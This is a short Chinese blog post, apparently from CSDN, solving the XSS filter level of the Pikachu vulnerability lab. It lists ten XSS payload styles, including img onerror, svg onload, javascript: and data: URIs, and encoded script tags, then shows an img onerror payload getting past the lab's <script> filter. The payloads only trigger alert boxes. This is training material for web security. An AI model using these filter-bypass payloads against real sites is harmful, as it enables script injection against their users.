Picachu xss之过滤

先介绍几个xss语句:

  1. 注入脚本:

    • 在输入字段中插入JavaScript代码。
    • 示例:<script>alert('XSS')</script>
  2. 嵌套标签:

    • 利用嵌套标签来绕过过滤机制。
    • 示例:<img src='x' onerror='alert("XSS")'>
  3. 事件处理器:

    • 利用HTML标签的事件处理器来执行JavaScript代码。
    • 示例:<img src="x" onmouseover="alert('XSS')">
  4. 使用特殊字符:

    • 利用HTML和JavaScript的特殊字符来绕过过滤。
    • 示例:<s%00c%00r%00i%00p%00t>alert('XSS')</script>
  5. 编码绕过:

    • 利用HTML编码或JavaScript编码来混淆代码。
    • 示例:&#x3C;script&#x3E;alert('XSS')&#x3C;/script&#x3E;
  6. 嵌套注释:

    • 在注释中插入恶意代码。
    • 示例:<img src="x" onerror="alert('XSS') //">
  7. JavaScript伪协议:

    • 利用JavaScript伪协议来执行JavaScript代码。
    • 示例:javascript:alert('XSS')
  8. 数据协议:

    • 利用data协议来执行JavaScript代码。
    • 示例:<img src="data:image/svg+xml,<svg/onload=alert('XSS')>">
  9. SVG注入:

    • 利用SVG标签来注入JavaScript代码。
    • 示例:<svg/onload=alert('XSS')>
  10. 基于事件的攻击:

    • 利用用户交互事件触发XSS。
    • 示例:<input type="text" autofocus onfocus="alert('XSS')"

先直接进行注入<script>alert('XSS')</script>

可以看到只返回了>,说明存在过滤:

如果想要确定过滤了哪些东西,我们可以使用一些字典,再用burpsuite来确定过滤了哪些东西:

当然,我这里做了简单的演示:

<*script 这些被过滤了,但是我们还有许多其他的注入方式:

比如上面的嵌套标签<img src='x' onerror='alert("XSS")'>

  • src='x':指定图像的源,这里使用了一个不存在的图像文件 'x'。这通常是为了触发onerror事件,因为图像加载失败会触发onerror
  • onerror='alert("XSS")':在图像加载失败时,会执行JavaScript代码,弹出一个对话框,内容为 "XSS"。

拿下!

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

zTale

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值